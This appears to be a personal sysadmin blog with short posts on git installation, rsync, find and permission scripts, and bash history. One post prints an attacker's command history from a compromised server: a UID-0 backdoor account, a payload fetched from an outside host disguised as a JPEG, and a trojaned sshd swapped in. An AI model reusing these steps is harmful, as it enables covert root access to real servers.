tech.jerkharris.com

My feelings on operating systems

jake — Tue, 21 Oct 2008 08:40:21 +0000

Alright, there are a lot of distro zealots out there. If you’ve worked in IT for any extended amount of time, you will have known at least one or two. You know the type, the guy who tells you that “blank” is the best distro for everything. I’ll admit it, I was that guy once in my life. If you’re an experienced linux user, chances are you’ve been that guy too. Alas, we all grow up. The best way to sum up operating systems, in my opinion, has been quote I borrowed from Robert DeNiro’s character Sam from the movie Ronin. That quote being “Its a toolbox” in response to the question “What do you favor?”. Of course, he was speaking of guns. However, I am not a mercenary. I’m a system admin. The phrase still holds true for my profession as it probably does for many others. However, in my experience, I feel this is especially fitting to operating systems. At a job interview for my first real IT job, I was asked, “What is your favorite operating system.” Of course, I told the truth. I have no favorite. I use what works best for the job at hand. I felt this was a very good answer. However, the interviewer pressed the point, wanting to know what I favored. Its a shame I did not muster the afore mentioned quote. I finally just told him I preferred Linux, as the place I was interviewing for was a Linux shop and I knew that was the answer they were looking for. So, there you have it my $.02.

Installing git on CentOS 5

jake — Fri, 03 Oct 2008 01:47:59 +0000

The install process for this is fairly simple. These packages come from the EPEL repositories. EPEL stands for Extra Packages for Enterprise Linux. It is maintained by the Fedora project. So, a big thanks to them!

Down to business!

wget http://download.fedora.redhat.com/pub/epel/5/i386/perl-Git-1.5.5.1-2.el5.i386.rpm

wget http://download.fedora.redhat.com/pub/epel/5/i386/perl-Error-0.17010-1.el5.noarch.rpm

wget http://download.fedora.redhat.com/pub/epel/5/i386/git-1.5.5.1-2.el5.i386.rpm

rpm -ivh perl-Git-1.5.5.1-2.el5.i386.rpm perl-Error-0.17010-1.el5.noarch.rpm git-1.5.5.1-2.el5.i386.rpm

That’s all there is to it!

A new project

jake — Sat, 22 Dec 2007 03:58:32 +0000

Hey everyone. Sorry I haven’t been posting much lately. I’ve been working on another project that has been taking most of my time. My girlfriend has been in town the past few weeks visiting as well. So most of my time outside of work is already spoken for.

The project I’ve been working on is a web based front end to my router box written in PHP. First, the router isn’t your standard store bought model. It’s a little beefier to say the least. The router is actually a Pentium III 650MHz w/256 MB of RAM running Fedora Core 6. I built it a little over a year and a half ago to learn more about routing using Linux. But more specifically, I wanted to learn more about iptables. It has served well as a learning device. But, I really can’t say that I understand everything as much as I’d like to.

So, the other night I got bored and decided to try some packet sniffing on my network to see what was going on while I was at work. What I didn’t really realize was that the sniffer I chose to use (ettercap) disabled ip forwarding. Not a good thing to disable on your router. I had to call my girlfriend and have her hook a monitor and keyboard up to the machine, then find the script, then run it. Not an easy task for someone whose passion is painting and not linux. I have to say she did a good job for being totally clueless as to what she was doing. After that mutual headache, I decided I needed an easier way run the script than logging in locally.

I decided the best way to do this would be to create a web based interface. I figured using PHP would be preferable. This is something I had never done before. And to be honest, I was fairly intimidated. The extent of my PHP knowledge consisted of using passthru to run whoami to see what user php scripts were being executed by. Well, it was actually a lot easier than I had thought it would be. I’ve put about 8 hours into the project thus far and I have implemented an inbound and outbound IP blocker, DHCP host adder, and Squid ACL adder. Information about the system is also displayed, such as the kernel, disk and memory usage, and bandwidth graphs on both LAN and WAN interfaces. I’ve included a screen shot of the main page after the jump for anyone interested. Its not very pretty, but its at least functional. Anybody have any good names for this concoction?

rsync starter

jake — Fri, 07 Dec 2007 02:50:55 +0000

A fantastic utility for copying files in a unix based environment is rsync. It will let you copy from one location to another or to another computer if need be. You can do a lot of things with rsync. But lets start out with the basics.

Copying locally:

rysnc is like most other copy utilities. You must specify a source and a destination. Here are some examples.

rsync -av /home /backup

This will copy the entire /home directory to /backup. Notice there is no trailing slash on the source of /home. This tells rsync to transfer /home and all the contents within. If you included a trailing slash rsync would transfer all of the files within the home directory, but not home itself. This is an important point to keep in mind.

Now.. Say you need to restore a user’s public_html contents. The syntax would be as follows.

rsync -av /backup/home/user1/public_html/ /home/user1/public_html

Okay now.. Getting the hang of it? Now for some really cool stuff!

Transferring to and from remote machines:

So, recently I got a new laptop and I wanted to copy my music collection over to it so I could have more to listen to at work. I used rsync over SSH to get this done. Now, generally you probably don’t want to have rsync open to the public if you want to maintain some privacy and security. That is why it is wise to use rsync over ssh. This sounds much more complicated than it actually is.

rsync -ave ssh harrisj@nas:/home/share/music/ harrisj@laptop:~/Music/

The only thing that you need to do is to add the -e flag to execute a command. So in this case, we use -e ssh to execute rsync over ssh. The way I have illustrated above will allow you to transfer from one machine to another without being logged into either of them. This is in my opinion one of the coolest things about rsync.

Flags:

Some of my favorite flags.

-a, –archive archive mode; same as -rlptgoD (no -H)
-v, –verbose increase verbosity
-e, –rsh=COMMAND specify the remote shell to use
-q, –quiet suppress non-error messages

–progress show progress during transfer
–exclude=PATTERN exclude files matching PATTERN

Hopefully this is a good starter for all of you out there that aren’t that well versed with rsync. I find this utility being used more than twice in my every day computing life. Please post any questions in the comments.

Delete empty directories

jake — Wed, 21 Nov 2007 07:22:39 +0000

Over the years, my music collection has moved from one drive to another to another and so on. Unfortunately, I’ve lost some data through my own poor copy methods. This has left me with a lot of empty directories. Cleaning these out when you have more than 200 directories to pick through can be rather tedious. Thank goodness for find! Use the following to clean out your empty directories.

find ~/dir -empty -type d -exec rmdir ‘{}’ ‘;’

Finding and removing files with weak permissions

jake — Sat, 17 Nov 2007 22:18:53 +0000

This is a nice little script that I use to clean up files and directories with poor permissions. Its great to use in preparation before installing mod_suPHP/PHP suexec.

#!/bin/bash

# Make sure all files are owned by the correct user. Get rid of file owned by nobody
for i in $(ls /home| cut -f1 -d/); do chown -R $i:$i /home/$i/public_html/*; done

# Find all files that are 777 and change them to 644
for i in $(find /home/*/public_html -perm 777 -type f); do chmod 644 $i; done

# Find all directories that are 777 and change them to 755
for i in $(find /home/*/public_html -perm 777 -type d); do chmod 755 $i; done

Adding Timestamps to your bash history

jake — Tue, 06 Nov 2007 05:55:56 +0000

This is easily done by adding two lines to your .bashrc file.

HISTTIMEFORMAT="(%m/%d/%y) %T "

export HISTTIMEFORMAT

Now your bash history will have the date and time that each command was run.

545  (11/05/07) 08:46:14 ssh root@192.168.0.1

history of a compromised server

jake — Wed, 31 Oct 2007 03:41:16 +0000

Here you have the bash_history excerpt from a compromised server. The attacker was lazy enough to not even cover his/her tracks. My night just got a whole lot more exciting due to this though.

 /usr/sbin/useradd -o -u 0 oracle

 passwd oracle

 /sbin/ifconfig |grep inet

 cd /home/oracle

 ls

 wget domain.tld/user/sniff.jpg

 tar xzvf sniff.jpg

 cd ssh

 ls

 telnet localhost 22

 nano apps/ssh/ssh2version.h

 SSH-2.0-OpenSSH_3.9p1

 ./configure –without-x ; make ; make install

 rm -rf /usr/sbin/sshd ; cp /usr/local/sbin/sshd /usr/sbin

 kill -9 `cat /var/run/sshd.pid` ; /usr/sbin/sshd

 cd ..

 ls

 rm -rf sniff.jpg  ssh

Caught by rkhunter.

New Plugin, Better formatting!

jake — Mon, 30 Jul 2007 22:12:46 +0000

A big thanks to my good man Shelby over at fauxzen.com for suggesting the SemGeshi CodeFix plugin. It has made my site look way better!

Custom Error Pages

jake — Sat, 21 Jul 2007 02:48:47 +0000

I got bored at work the other day and decided to whip up some custom error pages. You can see them for yourself.